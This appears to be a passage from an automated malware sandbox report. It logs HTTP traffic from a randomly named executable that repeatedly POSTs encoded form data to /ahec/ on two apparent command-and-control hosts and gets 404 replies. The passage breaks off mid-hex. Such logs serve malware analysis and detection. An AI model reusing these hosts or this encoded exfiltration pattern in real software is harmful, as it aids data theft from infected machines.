                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        33192.168.2.104974585.159.66.93805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:51:20.454240084 CET792OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.magmadokum.com
                                                                        Origin: http://www.magmadokum.com
                                                                        Referer: http://www.magmadokum.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 4e 46 74 71 31 66 72 4c 33 79 67 31 77 61 43 42 39 61 69 6c 63 6f 64 35 5a 32 32 4e 50 46 44 55 4e 57 54 6b 51 50 4d 63 65 42 75 65 59 39 6e 4e 2f 75 4c 6e 59 69 43 33 6e 66 46 61 45 6d 64 51 56 36 65 46 55 43 61 78 66 67 64 52 70 4c 2f 72 63 77 73 45 42 76 6f 59 6a 72 4f 53 50 44 44 4b 68 4c 77 54 45 34 70 6c 50 56 54 59 37 6f 75 38 46 4b 6f 2f 4e 52 30 78 6e 43 70 4b 61 70 50 46 79 67 75 64 73 6e 55 5a 43 34 38 45 6a 65 76 4d 58 62 63 7a 33 6e 45 56 2f 42 52 77 4e 6b 63 4d 50 2f 61 72 38 59 37 59 61 42 71 79 65 52 30 34 47 67 3d 3d
                                                                        Data Ascii: Ot=NFtq1frL3yg1waCB9ailcod5Z22NPFDUNWTkQPMceBueY9nN/uLnYiC3nfFaEmdQV6eFUCaxfgdRpL/rcwsEBvoYjrOSPDDKhLwTE4plPVTY7ou8FKo/NR0xnCpKapPFygudsnUZC48EjevMXbcz3nEV/BRwNkcMP/ar8Y7YaBqyeR04Gg==
                                                                        Dec 2, 2023 18:51:20.737898111 CET279INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.14.1
                                                                        Date: Sat, 02 Dec 2023 17:51:20 GMT
                                                                        Content-Length: 0
                                                                        Connection: close
                                                                        X-Rate-Limit-Limit: 5s
                                                                        X-Rate-Limit-Remaining: 19
                                                                        X-Rate-Limit-Reset: 2023-12-02T17:51:25.6272314Z


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        34192.168.2.104974685.159.66.93805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:51:23.200404882 CET812OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.magmadokum.com
                                                                        Origin: http://www.magmadokum.com
                                                                        Referer: http://www.magmadokum.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 4e 46 74 71 31 66 72 4c 33 79 67 31 78 36 79 42 2f 39 4f 6c 65 49 64 6d 56 57 32 4e 42 6c 44 59 4e 58 76 6b 51 4f 59 4d 5a 30 47 65 59 66 50 4e 2b 76 4c 6e 64 69 43 33 73 2f 46 54 4a 47 64 58 56 36 43 4e 55 43 57 78 66 68 39 52 70 4c 50 72 66 43 45 48 48 2f 6f 61 33 62 4f 55 4c 44 44 4b 68 4c 77 54 45 37 56 50 50 56 72 59 37 34 65 38 4b 50 63 34 41 78 30 77 78 53 70 4b 4d 70 50 42 79 67 75 46 73 69 77 6a 43 36 45 45 6a 66 66 4d 58 4b 63 30 2b 6e 45 58 67 52 51 63 65 33 68 66 4d 73 75 30 7a 5a 2f 71 59 46 37 47 62 45 59 72 42 56 70 33 75 50 77 37 59 4e 69 2f 44 68 32 52 78 75 43 38 6d 47 67 3d
                                                                        Data Ascii: Ot=NFtq1frL3yg1x6yB/9OleIdmVW2NBlDYNXvkQOYMZ0GeYfPN+vLndiC3s/FTJGdXV6CNUCWxfh9RpLPrfCEHH/oa3bOULDDKhLwTE7VPPVrY74e8KPc4Ax0wxSpKMpPByguFsiwjC6EEjffMXKc0+nEXgRQce3hfMsu0zZ/qYF7GbEYrBVp3uPw7YNi/Dh2RxuC8mGg=
                                                                        Dec 2, 2023 18:51:23.484241962 CET279INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.14.1
                                                                        Date: Sat, 02 Dec 2023 17:51:23 GMT
                                                                        Content-Length: 0
                                                                        Connection: close
                                                                        X-Rate-Limit-Limit: 5s
                                                                        X-Rate-Limit-Remaining: 18
                                                                        X-Rate-Limit-Reset: 2023-12-02T17:51:25.6272314Z


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        35192.168.2.104974785.159.66.93805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:51:26.871557951 CET1825OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.magmadokum.com
                                                                        Origin: http://www.magmadokum.com
                                                                        Referer: http://www.magmadokum.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 4e 46 74 71 31 66 72 4c 33 79 67 31 78 36 79 42 2f 39 4f 6c 65 49 64 6d 56 57 32 4e 42 6c 44 59 4e 58 76 6b 51 4f 59 4d 5a 79 65 65 62 73 33 4e 2f 4d 6a 6e 61 69 43 33 68 66 46 57 4a 47 63 53 56 36 61 4a 55 43 4b 62 66 6b 35 52 6f 6f 48 72 65 7a 45 48 4f 2f 6f 61 31 62 4f 56 50 44 44 6c 68 4c 41 4d 45 37 46 50 50 56 72 59 37 37 47 38 44 36 6f 34 43 78 30 78 6e 43 70 4f 61 70 4f 6d 79 67 32 56 73 6a 77 7a 42 4c 6b 45 74 63 33 4d 57 38 49 30 6d 33 45 76 6a 52 51 45 65 33 73 48 4d 73 43 4f 7a 59 4c 45 59 47 72 47 49 67 4a 53 55 6d 70 72 31 74 49 52 62 50 6d 4c 51 52 48 42 31 38 6a 34 35 78 72 50 67 75 51 75 48 67 36 77 42 37 71 71 2b 6e 68 4d 64 50 34 36 53 42 54 6b 49 64 37 44 4e 76 34 42 6c 4e 6e 2b 43 5a 47 51 7a 47 77 52 63 48 7a 6a 71 49 6f 75 75 2b 2b 37 4d 55 38 61 69 5a 47 5a 41 43 71 6d 2f 7a 57 49 57 75 49 55 46 64 34 4c 52 46 61 31 38 6c 5a 47 79 76 32 42 56 79 6b 35 73 6f 55 42 67 76 48 44 69 45 4c 66 68 2b 69 2f 52 7a 71 30 65 54 61 72 62 4b 4e 46 33 2f 71 54 76 44 7a 6f 43 6d 58 72 4f 70 42 52 48 49 77 30 6e 74 34 61 6c 6f 53 46 45 56 42 37 75 62 31 34 38 49 76 39 77 71 44 64 64 44 55 73 62 49 30 36 6c 2f 4f 68 6c 68 35 45 58 4c 4f 76 6f 49 6f 37 76 5a 45 69 7a 43 37 72 51 50 78 66 59 54 48 36 73 43 76 79 72 48 41 57 36 79 38 7a 53 41 65 73 52 63 36 6e 73 6a 74 39 58 78 74 67 47 53 61 43 68 6e 47 49 6a 30 41 2b 31 41 77 5a 7a 56 44 36 32 5a 37 79 6a 36 41 57 39 76 46 45 53 76 6d 31 54 53 61 32 5a 4c 51 45 77 35 4c 65 73 52 49 42 30 41 39 43 75 58 4c 50 79 45 32 56 38 4b 63 38 53 66 53 44 38 74 43 77 69 49 75 65 6f 30 30 59 32 72 45 33 63 6d 2f 61 64 6f 64 52 45 51 78 6d 69 76 62 41 48 79 65 41 69 6a 57 57 6e 64 7a 59 66 31 61 4b 31 7a 6b 73 32 34 79 65 6a 63 70 36 49 73 56 4b 34 46 4b 62 55 37 32 44 5a 37 73 61 34 53 4d 6d 67 75 43 32 6e 56 45 6c 38 45 32 4e 6d 75 76 51 37 67 4f 54 59 31 49 54 36 6e 64 34 54 71 75 6d 33 77 43 64 49 77 79 70 53 39 38 34 6a 79 61 2f 32 54 2f 4c 49 71 57 36 43 53 33 51 52 4f 4b 4b 63 55 78 63 6d 4f 2f 67 53 52 42 35 58 56 74 2b 51 6c 6f 6f 62 51 34 54 6c 64 79 62 72 74 4f 57 51 4e 75 35 68 6b 77 6b 30 4f 57 63 37 6c 4e 46 68 46 6f 67 39 70 6a 4a 77 69 2b 5a 5a 78 4e 54 4d 63 53 57 78 2f 49 65 45 30 64 7a 43 78 70 71 61 45 5a 68 56 68 31 7a 46 7a 6c 58 6a 41 61 2f 58 72 78 4e 47 45 4a 49 6c 46 46 64 7a 79 30 42 52 4c 58 31 48 51 56 4d 6f 62 48 43 36 45 4e 49 49 66 51 7a 67 4f 31 2f 47 31 6e 6f 42 2f 45 4a 52 43 6b 76 64 4b 51 42 77 31 79 51 53 73 77 78 54 4f 65 51 4a 42 79 49 6e 34 2f 66 74 4c 48 33 4c 69 6c 55 76 4c 44 72 54 57 30 64 36 69 6e 66 4f 34 77 41 39 71 50 5a 43 4c 33 78 70 69 55 73 78 33 31 67 49 39 35 42 64 31 46 6b 55 62 51 37 53 52 54 42 6c 32 77 55 74 78 4e 34 33 36 6f 53 4e 51 37 77 6b 74 6a 69 32 34 53 6d 48 30 30 6e 56 56 56 44 6b 66 43 6f 55 46 4d 56 59 67 36 5a 38 6d 58 55 68 6d 38 4f 78 7a 62 51 2f 35 73 54 4e 4c 37 2b 62 66 30 7a 70 75 76 57 41 39 55 41 48 5a 4b 38 72 41 34 6e 57 2f 62 31 56 6a 77 36 44 34 54 69 35 65 63 2f 44 62 77 6e 49 54 61 4d 71 66 2b 6c 6f 4b 6a 79 68 6d 46 70 52 68 30 74 59 32 78 51 47 63 44 31 68 78 7a 51 70 49 48 42 61 39 70 6d 4c 46 63 2b 52 44 55 4a 62 6d 65 61 75 78 54 6a 48 6b 4d 32 54 47 2b 5a 75 35 5a 35 6c 38 51 4b 70 5a 4e 77 78 64 75 74 6b 49 75 6e 78 46 58 47 55 70 62 38 35 4f 32 67 73 62 74 72 42 45 37 75 51 72 66 6a 49 58 35 56 37 63 6a 70 41 64 37 4e 63 4e 79 66 49 46 47 51 53 6c 38 35 7a 52 71 31 77 49 59 62 67 4e 6d 73 6b 56 59 2f 31 58 32 5a 71 41 49 31 54 59 42 46 79 30 78 42 33 77 70 73 45 74 73 74 4a 75 72 56 4b 77 58 54 61 6d 38 6b 55 48 44 4d 4b 48 2f 63 47 63 63 6e 66 4f 4c 63 6d 36 6f 57 4d 50 65 6a 4b 48 58 6e 4d 4a 51 2f 66 5a 56 49 5a 38 55 2b 6a 58 71 46
                                                                        Data Ascii: Ot=NFtq1frL3yg1x6yB/9OleIdmVW2NBlDYNXvkQOYMZyeebs3N/MjnaiC3hfFWJGcSV6aJUCKbfk5RooHrezEHO/oa1bOVPDDlhLAME7FPPVrY77G8D6o4Cx0xnCpOapOmyg2VsjwzBLkEtc3MW8I0m3EvjRQEe3sHMsCOzYLEYGrGIgJSUmpr1tIRbPmLQRHB18j45xrPguQuHg6wB7qq+nhMdP46SBTkId7DNv4BlNn+CZGQzGwRcHzjqIouu++7MU8aiZGZACqm/zWIWuIUFd4LRFa18lZGyv2BVyk5soUBgvHDiELfh+i/Rzq0eTarbKNF3/qTvDzoCmXrOpBRHIw0nt4aloSFEVB7ub148Iv9wqDddDUsbI06l/Ohlh5EXLOvoIo7vZEizC7rQPxfYTH6sCvyrHAW6y8zSAesRc6nsjt9XxtgGSaChnGIj0A+1AwZzVD62Z7yj6AW9vFESvm1TSa2ZLQEw5LesRIB0A9CuXLPyE2V8Kc8SfSD8tCwiIueo00Y2rE3cm/adodREQxmivbAHyeAijWWndzYf1aK1zks24yejcp6IsVK4FKbU72DZ7sa4SMmguC2nVEl8E2NmuvQ7gOTY1IT6nd4Tqum3wCdIwypS984jya/2T/LIqW6CS3QROKKcUxcmO/gSRB5XVt+QloobQ4TldybrtOWQNu5hkwk0OWc7lNFhFog9pjJwi+ZZxNTMcSWx/IeE0dzCxpqaEZhVh1zFzlXjAa/XrxNGEJIlFFdzy0BRLX1HQVMobHC6ENIIfQzgO1/G1noB/EJRCkvdKQBw1yQSswxTOeQJByIn4/ftLH3LilUvLDrTW0d6infO4wA9qPZCL3xpiUsx31gI95Bd1FkUbQ7SRTBl2wUtxN436oSNQ7wktji24SmH00nVVVDkfCoUFMVYg6Z8mXUhm8OxzbQ/5sTNL7+bf0zpuvWA9UAHZK8rA4nW/b1Vjw6D4Ti5ec/DbwnITaMqf+loKjyhmFpRh0tY2xQGcD1hxzQpIHBa9pmLFc+RDUJbmeauxTjHkM2TG+Zu5Z5l8QKpZNwxdutkIunxFXGUpb85O2gsbtrBE7uQrfjIX5V7cjpAd7NcNyfIFGQSl85zRq1wIYbgNmskVY/1X2ZqAI1TYBFy0xB3wpsEtstJurVKwXTam8kUHDMKH/cGccnfOLcm6oWMPejKHXnMJQ/fZVIZ8U+jXqF
                                                                        Dec 2, 2023 18:51:27.155056000 CET279INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.14.1
                                                                        Date: Sat, 02 Dec 2023 17:51:27 GMT
                                                                        Content-Length: 0
                                                                        Connection: close
                                                                        X-Rate-Limit-Limit: 5s
                                                                        X-Rate-Limit-Remaining: 19
                                                                        X-Rate-Limit-Reset: 2023-12-02T17:51:32.0444117Z


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        36192.168.2.104974885.159.66.93805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:51:29.623502016 CET512OUTGET /ahec/?Ot=AHFK2pjoxw5zzLKjgIeieoxyeFKGBXiFIXzrT8sRZEqLGYv6y8nhVjDsidhHFHxwb+HDFiGiPRNZnrHWQBMiJvor1pzBMUzxhg==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.magmadokum.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:51:29.848659992 CET279INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.14.1
                                                                        Date: Sat, 02 Dec 2023 17:51:29 GMT
                                                                        Content-Length: 0
                                                                        Connection: close
                                                                        X-Rate-Limit-Limit: 5s
                                                                        X-Rate-Limit-Remaining: 19
                                                                        X-Rate-Limit-Reset: 2023-12-02T17:51:34.7376795Z


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        37192.168.2.1049749162.241.252.161805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:51:35.305404902 CET810OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.thecoloringbitch.com
                                                                        Origin: http://www.thecoloringbitch.com
                                                                        Referer: http://www.thecoloringbitch.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 71 44 64 4b 75 39 30 73 72 47 53 47 69 50 32 2f 43 45 5a 2f 62 71 54 50 4c 2b 30 34 71 56 4b 73 54 68 4b 4b 63 73 56 34 63 4a 79 6b 49 50 43 72 5a 30 6c 76 38 36 4c 33 42 73 76 76 50 73 56 7a 64 61 75 37 4c 57 68 59 6d 50 63 53 78 44 46 79 6a 5a 77 69 55 6f 43 75 58 75 6d 67 44 30 44 4b 6d 6e 7a 64 55 33 30 69 52 68 7a 64 77 61 76 70 73 2f 66 75 67 6b 6e 74 71 67 32 65 4a 2f 31 6f 61 30 6d 6e 6d 49 49 50 68 4a 74 64 4c 36 47 31 4a 6b 56 51 6d 6c 55 45 53 69 66 52 57 46 6d 70 48 61 32 47 6c 70 6e 32 41 7a 45 39 48 6a 59 6a 32 51 3d 3d
                                                                        Data Ascii: Ot=qDdKu90srGSGiP2/CEZ/bqTPL+04qVKsThKKcsV4cJykIPCrZ0lv86L3BsvvPsVzdau7LWhYmPcSxDFyjZwiUoCuXumgD0DKmnzdU30iRhzdwavps/fugkntqg2eJ/1oa0mnmIIPhJtdL6G1JkVQmlUESifRWFmpHa2Glpn2AzE9HjYj2Q==
                                                                        Dec 2, 2023 18:51:35.506577969 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:35 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        38192.168.2.1049750162.241.252.161805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:51:38.028748989 CET830OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.thecoloringbitch.com
                                                                        Origin: http://www.thecoloringbitch.com
                                                                        Referer: http://www.thecoloringbitch.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 71 44 64 4b 75 39 30 73 72 47 53 47 6b 75 47 2f 45 6e 78 2f 53 71 54 4d 56 75 30 34 67 31 4b 6f 54 68 47 4b 63 75 35 53 64 38 69 6b 49 75 53 72 59 78 52 76 2f 36 4c 33 55 63 76 51 4c 73 55 2f 64 61 7a 49 4c 55 31 59 6d 4c 30 53 78 47 70 79 6b 75 63 74 58 59 43 6f 61 4f 6d 6d 48 30 44 4b 6d 6e 7a 64 55 33 67 45 52 67 62 64 78 71 2f 70 73 64 33 70 38 55 6e 79 67 41 32 65 59 50 31 73 61 30 6e 58 6d 4d 41 68 68 50 68 64 4c 37 32 31 4a 78 35 54 73 6c 55 47 57 69 65 47 54 30 32 6d 50 49 61 66 6f 38 2b 7a 61 6e 56 4e 47 32 30 77 78 70 4e 61 35 63 6c 59 79 57 50 4c 35 76 42 4d 44 54 48 6b 66 49 77 3d
                                                                        Data Ascii: Ot=qDdKu90srGSGkuG/Enx/SqTMVu04g1KoThGKcu5Sd8ikIuSrYxRv/6L3UcvQLsU/dazILU1YmL0SxGpykuctXYCoaOmmH0DKmnzdU3gERgbdxq/psd3p8UnygA2eYP1sa0nXmMAhhPhdL721Jx5TslUGWieGT02mPIafo8+zanVNG20wxpNa5clYyWPL5vBMDTHkfIw=
                                                                        Dec 2, 2023 18:51:38.231230974 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:38 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        39192.168.2.1049751162.241.252.161805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:51:40.749174118 CET1843OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.thecoloringbitch.com
                                                                        Origin: http://www.thecoloringbitch.com
                                                                        Referer: http://www.thecoloringbitch.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 71 44 64 4b 75 39 30 73 72 47 53 47 6b 75 47 2f 45 6e 78 2f 53 71 54 4d 56 75 30 34 67 31 4b 6f 54 68 47 4b 63 75 35 53 64 38 71 6b 4c 5a 53 72 58 79 4a 76 2b 36 4c 33 56 63 76 56 4c 73 56 6c 64 61 72 45 4c 55 6f 6a 6d 4e 77 53 33 67 39 79 68 63 6b 74 4d 49 43 6f 54 75 6d 6a 44 30 43 58 6d 6e 6a 5a 55 33 77 45 52 67 62 64 78 6f 58 70 38 66 66 70 76 45 6e 74 71 67 32 73 4a 2f 31 45 61 30 2b 76 6d 4d 4d 66 68 2f 42 64 4b 62 6d 31 4b 44 42 54 78 31 55 59 59 43 65 4f 54 30 37 6d 50 49 47 35 6f 38 6a 57 61 6b 46 4e 44 43 39 59 73 4b 64 4f 6b 71 6c 46 79 56 6e 64 34 49 51 44 65 69 66 67 64 75 30 30 31 6a 58 7a 4b 51 56 32 50 6c 30 46 66 73 51 76 41 4f 4f 37 58 75 59 6a 74 56 6f 34 42 41 34 30 5a 57 76 49 55 49 74 67 4d 45 32 69 73 70 30 6a 4b 47 32 64 6a 53 53 30 64 77 54 38 45 4a 54 51 33 78 4e 2f 77 52 4c 74 31 6b 34 55 7a 33 37 6a 4b 4f 77 79 66 72 35 49 56 50 6f 65 35 6b 4a 7a 68 69 75 4a 5a 68 76 57 4a 66 74 7a 6e 34 74 2b 67 67 47 50 7a 33 74 55 58 33 31 64 31 30 4a 6e 55 6f 55 58 73 4d 6c 77 45 73 65 32 71 69 55 68 49 4e 6e 64 5a 6b 49 6b 61 5a 74 36 6e 63 34 30 6f 7a 46 7a 50 4d 74 31 31 62 36 63 76 58 4a 4b 64 6c 47 68 39 31 4c 53 6f 45 74 59 55 5a 71 47 39 2b 78 43 52 72 5a 4e 75 63 69 62 35 31 44 69 75 7a 6e 79 47 59 59 4b 78 53 52 57 44 65 4f 52 41 47 35 47 53 62 2f 38 6a 39 52 70 76 71 67 51 62 6a 52 38 33 70 65 4a 36 58 70 31 48 6f 6a 5a 70 35 75 62 75 69 44 4d 79 52 39 6e 61 74 2f 46 59 4c 62 4c 4e 76 75 65 32 7a 64 